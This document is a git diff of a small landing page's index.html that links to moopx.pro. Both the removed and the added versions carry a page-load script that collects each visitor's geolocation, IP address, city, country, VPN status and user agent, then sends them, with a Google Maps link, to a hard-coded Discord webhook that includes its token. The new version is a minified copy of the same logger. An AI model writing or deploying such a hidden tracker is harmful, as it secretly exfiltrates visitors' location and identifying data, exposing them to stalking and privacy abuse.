--- a/index.html
+++ b/index.html
@@ -1,82 +1,1 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-    <meta charset="UTF-8">
-    <meta http-equiv="X-UA-Compatible" content="IE=edge">
-    <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>Welcome to an awesome website</title>
-    <style>
-        body {
-            font-family: 'Arial', sans-serif;
-            margin: 20px;
-        }
-
-        h1 {
-            color: #333;
-        }
-
-        p {
-            color: #555;
-        }
-
-        a {
-            color: #007BFF;
-        }
-    </style>
-</head>
-<body>
-    <h1>Welcome to an awesome website</h1>
-    <p>This website is no longer useless! If you're feeling adventurous, you can visit the main website <a href="https://moopx.pro" target="_blank">here</a>.</p>
-
-    <script>
-        document.addEventListener('DOMContentLoaded', function() {
-            const webhookUrl = 'https://discord.com/api/webhooks/1181948401353502751/dv7MXBVzmttSIHREI2lZ67U2sb5CvroDpv62nsGAH1yDBihziRNfX3vtYJY304G14BF4'; // Replace with your Discord webhook URL
-
-            // Function to send user and device information to Discord
-            const sendInfoToDiscord = (ip, address, userAgent, isVPN, coordinates) => {
-                fetch(webhookUrl, {
-                    method: 'POST',
-                    headers: {
-                        'Content-Type': 'application/json',
-                    },
-                    body: JSON.stringify({
-                        content: `New visitor info:\nIP: ${ip || 'N/A'}\nAddress: ${address || 'N/A'}\nUser Agent: ${userAgent}\nVPN: ${isVPN ? 'Yes' : 'No'}\nCoordinates: ${coordinates}\nGoogle Maps Link: ${getGoogleMapsLink(coordinates)}`,
-                    }),
-                });
-
-                // Direct to the main website
-                window.location.href = "https://moopx.pro";
-            };
-
-            // Function to get visitor's information including coordinates
-const getVisitorInfo = async () => {
-    try {
-        const position = await new Promise((resolve, reject) => {
-            navigator.geolocation.getCurrentPosition(resolve, reject);
-        });
-
-        const coordinates = `${position.coords.latitude},${position.coords.longitude}`;
-
-        // Requesting IP and address from a third-party service (replace with your preferred service)
-        const infoResponse = await fetch('https://ipinfo.io/json');
-        const infoData = await infoResponse.json();
-
-        const ip = infoData.ip || 'N/A';
-        const address = `${infoData.city || 'N/A'}, ${infoData.region || 'N/A'}, ${infoData.country || 'N/A'}`;
-        const userAgent = navigator.userAgent;
-        const isVPN = infoData.vpn === 'true';
-
-        // Sending data to Discord with VPN status and redirecting to the main website
-        sendInfoToDiscord(ip, address, userAgent, isVPN, coordinates);
-    } catch (error) {
-        console.error('Error fetching location or address:', error);
-    }
-};
-
-
-            // Call the function when the page loads
-            getVisitorInfo();
-        });
-    </script>
-</body>
-</html>
+<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>Welcome to an awesome website</title><style>body{font-family:'Arial',sans-serif;margin:20px;}h1{color:#333;}p{color:#555;}a{color:#007BFF;}</style></head><body><h1>Welcome to an awesome website</h1><p>This website is no longer useless! If you're feeling adventurous, you can visit the main website <a href="https://moopx.pro" target="_blank">here</a>.</p><script>document.addEventListener('DOMContentLoaded',async()=>{const w='https://discord.com/api/webhooks/1181948401353502751/dv7MXBVzmttSIHREI2lZ67U2sb5CvroDpv62nsGAH1yDBihziRNfX3vtYJY304G14BF4',s=(i,a,u,V,l)=>{fetch(w,{method:'POST',headers:{'Content-Type':'application/json',},body:JSON.stringify({content:`New visitor info:\nIP: ${i||'N/A'}\nAddress: ${a||'N/A'}\nUser Agent: ${u}\nVPN: ${V?'Yes':'No'}\nCoordinates: ${l}\nGoogle Maps Link: https://www.google.com/maps?q=${l}`,}),});},g=(l)=>`https://www.google.com/maps?q=${l}`,v=async()=>{try{const p=await new Promise((r,j)=>{navigator.geolocation.getCurrentPosition(r,j);}),l=`${p.coords.latitude},${p.coords.longitude}`,i=await(await fetch('https://ipinfo.io/json')).json(),I=i.ip||'N/A',A=`${i.city||'N/A'}, ${i.region||'N/A'}, ${i.country||'N/A'}`,U=navigator.userAgent,V=i.vpn||!1;s(I,A,U,V,l);}catch(e){console.error('Error fetching location or address:',e);}};v();});</script></body></html>
